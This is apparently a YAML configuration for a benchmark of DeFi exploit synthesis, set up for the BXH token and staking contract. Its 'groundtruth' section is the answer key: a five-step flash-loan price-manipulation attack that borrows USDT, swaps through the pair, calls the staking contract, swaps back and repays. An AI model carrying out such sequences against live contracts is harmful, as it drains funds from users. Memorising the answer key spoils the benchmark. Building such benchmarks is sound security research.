# Information for benchmarks building.
project_name: "BXH"

ctrt_name2cls:
  - ["bxh", "BXH"]
  - ["usdt", "USDT"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["bxhstaking", "BXHStaking"]

ctrt_name2deploy:
  - ["bxh", "new BXH()"]
  - ["usdt", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  - [
      "bxhstaking",
      "new BXHStaking(
      address(bxh),
      1 ether, 
      block.timestamp, 
      1000, 
      owner,
      address(usdt),
      address(pair)
      )",
    ]

extra_actions:
  - "function withdraw_bxhstaking_bxh(uint256 amount) internal {
    bxhstaking.deposit(0, amount);
    }"

extra_deployments:
  - "bxh.transfer(address(bxhstaking), 200000 ether);"
extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "owner", "usdt", "3110000e18"]
  - ["swap", "pair", "usdt", "bxh", "usdt.balanceOf(attacker)"]
  - ["transaction", "bxhstaking", "bxh", "0"]
  - ["swap", "pair", "bxh", "usdt", "bxh.balanceOf(attacker)"]
  - ["payback", "owner", "usdt", "3110000e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "bxh":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "pair":
    is_swappair: true
    uniswap_order: ["usdt", "bxh"]
    support_swaps:
      "usdt": ["bxh", "usdt"]
      "bxh": ["bxh", "usdt"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

  "bxhstaking":
    is_defientry: true
    hacked_assets: ["bxh"]

pattern: "BuySell Manipulation"
